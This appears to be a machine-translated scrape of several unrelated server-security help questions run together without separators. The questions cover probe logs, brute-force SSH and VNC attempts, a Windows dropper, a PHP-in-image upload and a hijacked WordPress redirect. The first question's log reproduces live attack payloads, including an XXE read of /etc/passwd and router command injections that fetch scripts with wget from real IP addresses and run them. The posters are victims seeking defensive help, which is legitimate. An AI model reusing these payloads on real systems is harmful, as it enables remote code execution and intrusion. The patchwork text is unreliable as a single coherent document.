问题[hacking](server)

（编辑：原来“奇怪的行为”是由一个简单的疏忽来解释的。把这个问题留在这里以防其他人忽略它）

我希望我问这个问题是对的。

我有一个简单的 Web 服务器应用程序设置，它做的很少。它在专用的 Ubuntu 主机上运行。Node 应用程序通过 PM2 运行，而 PM2 通过 NGINX 运行。Apache 通过 NGINX 运行一个单独的服务器，其中包含 Web 应用程序的图片。

我将节点应用程序设置为通过 console.log() 函数将所有带有时间戳的 URL 请求打印到标准输出。它还打印“404 Page Returned”返回 404 页面。PM2 将其保存在日志中。

像这样：

Event.Server (2021-05-06T00:24:48+00:00): End of client HTTP request -> /

当我将服务器上线的那一刻，它每天都充斥着可疑的请求（我假设这是正常的）。这些 URL 显然旨在利用不当的 URL 处理并尝试访问服务器上的敏感资源。日志通常如下所示：

Event.Server (2021-05-06T02:17:41+00:00): End of client HTTP request -> /boaform/admin/formLogin?username=admin&psd=admin

404 Page Returned

我服务器上的所有请求都发送到节点应用程序，该应用程序仅检查整个 URL 是否与某个文本字符串和一系列 IF 语句匹配，如果不匹配，则返回 404。该应用程序未设置为直接提取资源以任何方式从 URL 获取，所以我认为这对于这些类型的攻击/清理是防弹的。

我对网络安全知之甚少，但我认为如果服务器存在弱点，那肯定是 Apache/NGINX 配置而不是我的 Node 应用程序。

但是，应用程序已开始将奇怪的文本记录到标准输出。没有时间戳。它没有说“Event.Server”。

（哎呀，事实证明这是不正确的：）我的应用程序不会记录任何内容，除非有一些其他文本解释它正在记录什么。

然而，现在我发现我的应用程序中到处都有类似这样的记录：

0|first    | <!ELEMENT name ANY >
0|first    | <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
0|first    | <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
0|first    | <Request>
0|first    | <EMailAddress>aaaaa</EMailAddress>
0|first    | <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
0|first    | </Request>
0|first    | </Autodiscover>\x48\x48\x48\x48\x46\x00\x00\x00\x4a\x00\x00\x00\x57\x20\x00\x00\x00\x32\x00\x46\x00\x44\x00\x31\x00\x33\x00\x37\x00\x41\x00\x33\x00\x44\x00\x35\x00\x36\x00\x37\x00\x34\x00\x35\x00\x41\x00\x46\x00\x41\x00\x44\x00\x34\x00\x43\x00\x44\x00\x33\x00\x31\x00\x41\x00\x43\x00\x30\x00\x31\x00\x34\x00\x42\x00\x37\x00\x33\x00\x43\x00\x1c\x10\x11\x00\x00XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=$(busybox+wget+http://45.147.77.236/cache+-O+->+/dev/.p;sh+/dev/.p)&ipv=0
0|first    | _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfigusername[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/su")]=&password=&repeatedPassword=<?=md5("phpunit")?>cH<!DOCTYPE xxe [
0|first    | <!ELEMENT name ANY >
0|first    | <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
0|first    | <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
0|first    | <Request>
0|first    | <EMailAddress>aaaaa</EMailAddress>
0|first    | <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
0|first    | </Request>
0|first    | </Autodiscover><?=md5("phpunit")?><?=md5("phpunit")?><?=md5("phpunit")?>cH<!DOCTYPE xxe [
0|first    | <!ELEMENT name ANY >
0|first    | <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
0|first    | <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
0|first    | <Request>
0|first    | <EMailAddress>aaaaa</EMailAddress>
0|first    | <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
0|first    | </Request>
0|first    | </Autodiscover>\x48\x48\x48\x48\x46\x00\x00\x00\x4a\x00\x00\x00\x57\x20\x00\x00\x00\x32\x00\x46\x00\x44\x00\x31\x00\x33\x00\x37\x00\x41\x00\x33\x00\x44\x00\x35\x00\x36\x00\x37\x00\x34\x00\x35\x00\x41\x00\x46\x00\x41\x00\x44\x00\x34\x00\x43\x00\x44\x00\x33\x00\x31\x00\x41\x00\x43\x00\x30\x00\x31\x00\x34\x00\x42\x00\x37\x00\x33\x00\x43\x00\x1c\x10\x11\x00\x00ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+bin.sh%3B+wget+http%3A%2F%2F203.159.80.188%2Fbin.sh%3B+chmod+777+bin.sh%3B+.%2Fbin.sh%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1<?=md5("phpunit")?>

同样，这是在我的节点应用程序的标准输出日志中；它不是来自其他任何地方。从应用程序的设置方式来看，这对我来说似乎是不可能的，并且让我相信我的服务器可能已被入侵。

如果我需要提供其他信息，我绝对会。

如果这不是发布这个问题的好地方，如果有人在某个地方发表评论，我将非常感激。

我很茫然。我的问题是这样的：

我可能受到了损害吗？如果是这样，我需要做些什么来保护此服务器？

我们计划在同一个域上托管 WordPress 博客和电子商务商店，因此 URL 将如下所示：

example.com <--- Magento Store
example.com/blog/ <--- WordPress Blog

我们主要关心的是电子商务商店的安全性。我们觉得在同一个文档根目录中托管两个 CMS 并不安全。

是否有一些关于如何在同一个域上安全地托管多个 CMS 的最佳实践？我们曾想过

• 将部分代码移到文档根目录之外或
• 为每个 CMS 文件夹设置不同的所有者（或写入）权限

因此，如果有人入侵了 WordPress 博客，他们将无法访问该网站的其他部分。谢谢

我有一个用于托管网站的 Windows Server 2019 VPS。它具有所有最新更新。但不知何故，有一个（部分）黑客尝试。我首先通过收到的短信注意到它，因为 Microsoft 注册服务器 (regsvr32.exe) 的 CPU 使用率很高。在此站点和Process Explores的帮助下，原因是ProgramDAta文件夹中的 DLL。

在那里我找到了一个名为 的 zip set.zip。包含以下5个文件。comhij.dll, let.exe,和. rn.bat_ 似乎 .bat 文件已被执行并正在运行脚本。但它以某种方式失败了，也许是 Windows Defender 或其他东西阻止了它，导致 CPU 过高。我知道这一点，因为 .bat 中的最后几行导致它自行删除。而且我找不到脚本想要进行的任何更改。x.mofxg.dll

我将 zip 文件复制到自己的 PC 上，Norton 360 立即将 let.exe 识别为 Hacktool，将 comhij.dll 识别为 Trojan Horse，将 xg.dll 识别为 Trojan.Get.MTB。

服务器激活了 Windows 防火墙，并且在提供商级别TransIP也激活了防火墙。

我发现它set.zip是由没有 FTP 访问的 AppPools（托管DotNetNuke CMS ）之一创建的。

所以我的问题是如何找出这种情况是如何发生的，以及将来如何防止它发生？以及 AppPool 如何将文件写入其根目录之外的磁盘？根据要求，我可以发布整个 .bat 脚本。

我最近设置了一个向世界开放的 nginx，以便为全球用户提供 API。

它从注册到 Hostway.ru 托管服务提供商的 IP 地址中得到了很多“刺激”（即：弱点测试/黑客尝试）。

我使用这个工具来了解更多信息：https ://bgp.he.net 。我已经联系了 Hostway 并要求他们进行调查并停止这项活动 - 没有回应，也不足为奇。

是否有某种权威或全球黑名单，我可以向其报告此活动以追究公司的责任？

我现在已经将我的 nginx 配置为拒绝来自该 IP 的所有请求。还有什么我应该做的吗？我担心的是他们可以更改 IP/主机并重新开始。从长远来看，我如何保护自己免受这种流量的影响？

任何帮助表示赞赏。

从失败的恶意 SSH 尝试中可以了解到关于“用户”的哪些信息？

• 输入的用户名 ( /var/log/secure)
• 输入密码（如果已配置，即使用 PAM 模块）
• 源 IP 地址 ( /var/log/secure)

有没有其他提取方法？无论是隐藏在日志文件中的信息、随机技巧还是来自 3rd 方工具等。

我不确定我是否被黑客入侵。

我尝试通过 SSH 登录，但它不接受我的密码。根登录被禁用，所以我去救援并打开根登录并能够以根登录。作为root，我尝试使用我之前尝试登录的相同密码更改受影响帐户的密码，并passwd回复“密码未更改”。然后我将密码更改为其他密码并能够登录，然后将密码更改回原始密码，我再次能够登录。

我检查auth.log了密码更改，但没有发现任何有用的信息。

我还扫描了病毒和 rootkit，服务器返回了这个：

蛤蜊AV：

"/bin/busybox Unix.Trojan.Mirai-5607459-1 FOUND"

RK猎人：

"/usr/bin/lwp-request Warning: The command '/usr/bin/lwp-request' has been replaced by a script: /usr/bin/lwp-request: a /usr/bin/perl -w script, ASCII text executable

Warning: Suspicious file types found in /dev:"

应该注意的是，我的服务器并不广为人知。我还更改了 SSH 端口并启用了两步验证。

我担心我被黑了，有人试图愚弄我，“一切都很好，别担心”。

我的网站已被上传包含 PHP 代码的图像的用户入侵。此代码允许上传文件，并且他上传了一个恶意 PHP 脚本。

他能够在此 URL 上使用 GET 调用他的“image-php”：

http://mypwnedwebsite.com/image.jpg/.php

如何配置 nginx 以防止这种行为？我的意思是，对于一个简单的/.php，它就像一切都是 PHP 一样，从我的角度来看这是错误的。

我实际上有一个“经典”的 nginx 1.6.2 配置，我认为这部分是最相关的：

location ~ \.php$
    {
        fastcgi_pass 127.0.0.1:9000;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_read_timeout 120;
        include /etc/nginx/fastcgi_params;
    }

我有一台 linux 机器作为测试服务器运行。我的盒子直接在这台机器上重定向我的端口，比如 80。我创建它来训练所有类型的东西（raid，tcp ...）。

最近我尝试在 VNC 中连接到我的机器，我得到一个错误“太多的身份验证失败”，所以我检查了日志，我得到了一个可怕的惊喜；有人试图通过 VNC 中的蛮力连接到我的机器。这是此日志的简短摘录：

04/01/17 13:53:56 Got connection from client 111.73.46.90
04/01/17 13:53:56 Using protocol version 3.3
04/01/17 13:53:56 Too many authentication failures - client rejected
04/01/17 13:53:56 Client 111.73.46.90 gone
04/01/17 13:53:56 Statistics:
04/01/17 13:53:56   framebuffer updates 0, rectangles 0, bytes 0

04/01/17 13:53:57 Got connection from client 111.73.46.90
04/01/17 13:53:57 Using protocol version 3.3
04/01/17 13:53:57 Too many authentication failures - client rejected
04/01/17 13:53:57 Client 111.73.46.90 gone
04/01/17 13:53:57 Statistics:
04/01/17 13:53:57   framebuffer updates 0, rectangles 0, bytes 0

04/01/17 13:54:26 Got connection from client 111.73.46.90
04/01/17 13:54:26 Using protocol version 3.3
04/01/17 13:54:26 Too many authentication failures - client rejected
04/01/17 13:54:26 Client 111.73.46.90 gone
04/01/17 13:54:26 Statistics:
04/01/17 13:54:26   framebuffer updates 0, rectangles 0, bytes 0

04/01/17 13:56:07 Got connection from client 111.73.46.90
04/01/17 13:56:07 Using protocol version 3.3
04/01/17 13:56:07 Too many authentication failures - client rejected
04/01/17 13:56:07 Client 111.73.46.90 gone
04/01/17 13:56:07 Statistics:
04/01/17 13:56:07   framebuffer updates 0, rectangles 0, bytes 0

04/01/17 13:56:08 Got connection from client 111.73.46.90
04/01/17 13:56:08 Using protocol version 3.3
04/01/17 13:56:08 Too many authentication failures - client rejected
04/01/17 13:56:08 Client 111.73.46.90 gone
04/01/17 13:56:08 Statistics:
04/01/17 13:56:08   framebuffer updates 0, rectangles 0, bytes 0

04/01/17 13:56:43 Got connection from client 111.73.46.90
04/01/17 13:56:43 Using protocol version 3.3
04/01/17 13:56:43 Too many authentication failures - client rejected
04/01/17 13:56:43 Client 111.73.46.90 gone
04/01/17 13:56:43 Statistics:
04/01/17 13:56:43   framebuffer updates 0, rectangles 0, bytes 0

04/01/17 13:57:52 Got connection from client 111.73.46.90
04/01/17 13:57:54 Using protocol version 3.3
04/01/17 13:57:54 Too many authentication failures - client rejected
04/01/17 13:57:54 Client 111.73.46.90 gone
04/01/17 13:57:54 Statistics:
04/01/17 13:57:54   framebuffer updates 0, rectangles 0, bytes 0

04/01/17 13:59:22 Got connection from client 111.73.46.90
04/01/17 13:59:22 Using protocol version 3.3
04/01/17 13:59:22 Too many authentication failures - client rejected
04/01/17 13:59:22 Client 111.73.46.90 gone
04/01/17 13:59:22 Statistics:
04/01/17 13:59:22   framebuffer updates 0, rectangles 0, bytes 0

04/01/17 14:01:20 Got connection from client 111.73.46.90
04/01/17 14:01:21 Using protocol version 3.3
04/01/17 14:01:21 Too many authentication failures - client rejected
04/01/17 14:01:21 Client 111.73.46.90 gone
04/01/17 14:01:21 Statistics:
04/01/17 14:01:21   framebuffer updates 0, rectangles 0, bytes 0

04/01/17 14:03:48 Got connection from client 111.73.46.90
04/01/17 14:03:49 Using protocol version 3.3
04/01/17 14:03:49 Too many authentication failures - client rejected
04/01/17 14:03:49 Client 111.73.46.90 gone
04/01/17 14:03:49 Statistics:
04/01/17 14:03:49   framebuffer updates 0, rectangles 0, bytes 0

04/01/17 14:06:51 Got connection from client 111.73.46.90
04/01/17 14:06:51 Using protocol version 3.3
04/01/17 14:06:51 Too many authentication failures - client rejected
04/01/17 14:06:51 Client 111.73.46.90 gone
04/01/17 14:06:51 Statistics:
04/01/17 14:06:51   framebuffer updates 0, rectangles 0, bytes 0

04/01/17 14:10:18 Got connection from client 111.73.46.90
04/01/17 14:10:20 Using protocol version 3.3
04/01/17 14:10:20 Too many authentication failures - client rejected
04/01/17 14:10:20 Client 111.73.46.90 gone
04/01/17 14:10:20 Statistics:
04/01/17 14:10:20   framebuffer updates 0, rectangles 0, bytes 0

就像 29/12/16 一样，但我认为日志文件不会进一步保存。

我还检查了 ssh，我也有同样的事情：

Jan  3 15:18:00 raspberrypi sshd[24434]: Invalid user alan from 193.248.133.13
Jan  3 16:14:38 raspberrypi sshd[24797]: Invalid user vnc from 46.105.137.2
Jan  3 16:36:33 raspberrypi sshd[24951]: Invalid user user from 107.151.213.61
Jan  3 16:36:46 raspberrypi sshd[24956]: Invalid user user from 107.151.213.61
Jan  3 16:37:01 raspberrypi sshd[24965]: Invalid user admin from 107.151.213.61
Jan  3 16:37:18 raspberrypi sshd[24977]: Invalid user admin from 107.151.213.61
Jan  3 17:00:57 raspberrypi sshd[25128]: Invalid user admin from 182.37.8.7
Jan  3 17:07:48 raspberrypi sshd[25182]: Invalid user admin from 122.191.248.96
Jan  3 17:44:38 raspberrypi sshd[25546]: Invalid user admin from 51.15.59.6
Jan  3 17:44:58 raspberrypi sshd[25584]: Invalid user admin from 51.15.59.6
Jan  3 17:45:01 raspberrypi sshd[25588]: Invalid user guest from 51.15.59.6
Jan  3 17:45:02 raspberrypi sshd[25595]: Invalid user guest from 51.15.59.6
Jan  3 17:45:04 raspberrypi sshd[25599]: Invalid user support from 51.15.59.6
Jan  3 17:45:07 raspberrypi sshd[25603]: Invalid user user from 51.15.59.6
Jan  3 17:45:09 raspberrypi sshd[25607]: Invalid user admin from 51.15.59.6
Jan  3 17:45:16 raspberrypi sshd[25621]: Invalid user admin from 51.15.59.6
Jan  3 17:45:19 raspberrypi sshd[25625]: Invalid user test from 51.15.59.6
Jan  3 17:45:20 raspberrypi sshd[25629]: Invalid user vagrant from 51.15.59.6
Jan  3 17:45:25 raspberrypi sshd[25637]: Invalid user ubnt from 51.15.59.6
Jan  3 17:45:26 raspberrypi sshd[25641]: Invalid user guest from 51.15.59.6
Jan  3 17:45:29 raspberrypi sshd[25645]: Invalid user telnet from 51.15.59.6
Jan  3 17:50:33 raspberrypi sshd[25678]: Invalid user demo from 46.105.137.2
Jan  3 18:06:34 raspberrypi sshd[25853]: Invalid user ubnt from 67.204.49.5
Jan  3 19:10:52 raspberrypi sshd[26321]: Invalid user hello from 193.248.133.13
Jan  3 19:26:44 raspberrypi sshd[26435]: Invalid user ubuntu from 46.105.137.2
Jan  3 21:03:17 raspberrypi sshd[27099]: Invalid user ubuntu from 46.105.137.2
Jan  3 21:18:59 raspberrypi sshd[27236]: Invalid user ubnt from 163.172.233.70
Jan  3 21:19:15 raspberrypi sshd[27244]: Invalid user cusadmin from 163.172.233.70
Jan  3 21:19:38 raspberrypi sshd[27258]: Invalid user ts3 from 163.172.233.70
Jan  3 21:19:45 raspberrypi sshd[27262]: Invalid user tf2 from 163.172.233.70
Jan  3 21:19:53 raspberrypi sshd[27268]: Invalid user css from 163.172.233.70
Jan  3 21:20:00 raspberrypi sshd[27276]: Invalid user gmod from 163.172.233.70
Jan  3 21:20:08 raspberrypi sshd[27283]: Invalid user lgsm from 163.172.233.70
Jan  3 21:20:16 raspberrypi sshd[27287]: Invalid user starbound from 163.172.233.70
Jan  3 22:16:37 raspberrypi sshd[27663]: Invalid user admin from 123.31.34.216
Jan  3 22:16:42 raspberrypi sshd[27667]: Invalid user support from 123.31.34.216
Jan  3 22:40:04 raspberrypi sshd[27858]: Invalid user ubuntu from 46.105.137.2
Jan  3 22:41:51 raspberrypi sshd[27878]: Invalid user usuario from 219.140.230.198
Jan  3 23:15:37 raspberrypi sshd[28149]: Invalid user admin from 205.185.192.157
Jan  3 23:30:59 raspberrypi sshd[28279]: Invalid user admin from 179.233.94.73
Jan  4 00:16:13 raspberrypi sshd[28690]: Invalid user ubuntu from 46.105.137.2
Jan  4 01:50:24 raspberrypi sshd[29339]: Invalid user support from 193.248.133.13
Jan  4 01:52:23 raspberrypi sshd[29360]: Invalid user ubuntu from 46.105.137.2
Jan  4 02:05:31 raspberrypi sshd[29461]: Invalid user a from 213.229.108.216
Jan  4 02:05:40 raspberrypi sshd[29465]: Invalid user oracle from 213.229.108.216
Jan  4 02:30:18 raspberrypi sshd[29638]: Invalid user admin from 185.110.132.202
Jan  4 02:30:55 raspberrypi sshd[29647]: Invalid user tomcat7 from 193.248.133.13
Jan  4 02:42:14 raspberrypi sshd[29726]: Invalid user support from 185.110.132.202
Jan  4 02:48:08 raspberrypi sshd[29771]: Invalid user user from 185.110.132.202
Jan  4 02:53:58 raspberrypi sshd[29814]: Invalid user test from 185.110.132.202
Jan  4 02:59:49 raspberrypi sshd[29863]: Invalid user guest from 185.110.132.202
Jan  4 03:05:49 raspberrypi sshd[29911]: Invalid user anonymous from 185.110.132.202
Jan  4 03:11:35 raspberrypi sshd[29950]: Invalid user reception from 193.248.133.13
Jan  4 03:11:42 raspberrypi sshd[29956]: Invalid user ubnt from 185.110.132.202
Jan  4 03:17:38 raspberrypi sshd[29998]: Invalid user dlink from 185.110.132.202
Jan  4 03:23:25 raspberrypi sshd[30065]: Invalid user admin from 185.110.132.202
Jan  4 03:29:11 raspberrypi sshd[30146]: Invalid user ubuntu from 46.105.137.2
Jan  4 03:29:12 raspberrypi sshd[30150]: Invalid user admin from 185.110.132.202
Jan  4 04:42:36 raspberrypi sshd[30965]: Invalid user admin from 37.78.244.206
Jan  4 05:00:29 raspberrypi sshd[31105]: Invalid user admin from 8.26.21.218
Jan  4 05:00:31 raspberrypi sshd[31109]: Invalid user admin from 8.26.21.218
Jan  4 05:00:34 raspberrypi sshd[31113]: Invalid user test from 8.26.21.218
Jan  4 05:00:37 raspberrypi sshd[31117]: Invalid user guest from 8.26.21.218
Jan  4 05:00:40 raspberrypi sshd[31121]: Invalid user user from 8.26.21.218
Jan  4 05:00:43 raspberrypi sshd[31126]: Invalid user admin from 8.26.21.218
Jan  4 05:00:46 raspberrypi sshd[31130]: Invalid user admin from 8.26.21.218
Jan  4 05:00:52 raspberrypi sshd[31138]: Invalid user ubnt from 8.26.21.218
Jan  4 05:05:30 raspberrypi sshd[31173]: Invalid user ubuntu from 46.105.137.2
Jan  4 05:37:33 raspberrypi sshd[31404]: Invalid user admin from 122.189.192.75
Jan  4 06:29:09 raspberrypi sshd[31863]: Invalid user admin from 193.248.133.13
Jan  4 06:42:03 raspberrypi sshd[31957]: Invalid user ubuntu from 46.105.137.2
Jan  4 07:38:42 raspberrypi sshd[32641]: Invalid user admin from 175.20.94.253
Jan  4 09:17:42 raspberrypi sshd[1875]: Invalid user festival from 202.100.245.12
Jan  4 09:51:57 raspberrypi sshd[2482]: Invalid user admin from 95.30.228.51
Jan  4 09:51:58 raspberrypi sshd[2486]: Invalid user admin from 95.30.228.51
Jan  4 09:55:53 raspberrypi sshd[2562]: Invalid user ubuntu from 46.105.137.2
Jan  4 09:59:22 raspberrypi sshd[2652]: Invalid user ts from 70.35.196.91
Jan  4 10:44:10 raspberrypi sshd[3576]: Invalid user hadoop from 70.35.196.91
Jan  4 10:46:54 raspberrypi sshd[3646]: Invalid user admin from 95.215.60.223
Jan  4 10:46:57 raspberrypi sshd[3654]: Invalid user test from 95.215.60.223
Jan  4 10:47:00 raspberrypi sshd[3658]: Invalid user guest from 95.215.60.223
Jan  4 10:47:02 raspberrypi sshd[3662]: Invalid user user from 95.215.60.223
Jan  4 10:47:05 raspberrypi sshd[3667]: Invalid user admin from 95.215.60.223
Jan  4 10:47:08 raspberrypi sshd[3671]: Invalid user admin from 95.215.60.223
Jan  4 11:28:28 raspberrypi sshd[4525]: Invalid user username from 70.35.196.91
Jan  4 11:32:48 raspberrypi sshd[4605]: Invalid user ubuntu from 46.105.137.2
Jan  4 11:43:17 raspberrypi sshd[4794]: Invalid user xbian from 193.248.133.13
Jan  4 13:09:55 raspberrypi sshd[6034]: Invalid user ubuntu from 46.105.137.2
Jan  4 13:14:49 raspberrypi sshd[6061]: Invalid user admin from 115.239.230.222
Jan  4 13:14:58 raspberrypi sshd[6070]: Invalid user admin from 115.239.230.222
Jan  4 14:09:44 raspberrypi sshd[6937]: Invalid user admin from 218.108.215.128

我用一个站点检查了 ip 位置（不知道我是否可以相信结果？）它来自美国和中国。我认为他正在使用VPN。

我能做些什么 ？我刚刚关闭了我的机器，但我正在寻找更好的解决方案……我能知道是谁吗？我可以提出索赔吗？或者甚至只是阻止他试图入侵我？

感谢您的回答。

我的 Ubuntu 16.04 安装了最新的 Wordpress（只有一个或两个插件）被黑了。我启动了一个新的服务器安装来摆脱任何不好的东西。
除了从我的域到另一个域的 301 重定向之外，似乎什么都没发生。现在，即使在安装了新服务器之后，在一切都应该彻底完成之后，我的域仍然被重定向到另一个域。

我知道 301 意味着永久，但无论如何可以找回我的域名吗？还是真的就像现在需要几个月？还是就这样呆着？

当我从 Outlook 发送邮件时，正在生成额外的邮件并发送到未知 id。为什么会发生这种情况以及如何防止这种情况发生。